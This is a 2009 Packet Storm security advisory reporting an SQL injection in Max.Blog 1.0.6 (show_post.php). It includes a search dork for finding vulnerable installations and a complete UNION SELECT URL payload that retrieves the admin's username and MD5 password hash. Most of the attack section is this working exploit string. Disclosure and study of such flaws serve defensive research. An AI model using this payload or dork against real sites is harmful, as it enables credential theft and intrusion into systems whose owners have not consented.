Max Blog 1.0.6 SQL Injection

2009-01-27T00:00:00
ID PACKETSTORM:74356
Type packetstorm
Reporter Salvatore Fresta
Modified 2009-01-27T00:00:00

Description

                                        
                                            `################### Salvatore "drosophila" Fresta ###################  
  
  
Application: Max.Blog http://www.mzbservices.com  
Version: Max.Blog <= 1.0.6  
Bug: * SQL Injection  
Exploitation: Remote  
Dork: intext:"Powered by Max.Blog"  
Date: 20 Jan 2009  
Discovered by: Salvatore "drosophila" Fresta  
Author: Salvatore "drosophila" Fresta  
e-mail: drosophilaxxx@gmail.com  
  
  
############################################################################  
  
- BUGS  
  
SQL Injection:  
  
File affected: show_post.php  
  
This bug allows a guest to view username and password (md5) of a  
registered user with the specified id (usually 1 for the admin)  
  
http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username: ', username),concat('password: ', password),4,5,6,7+FROM+users+WHERE+id=1%23  
  
############################################################################  
  
  
`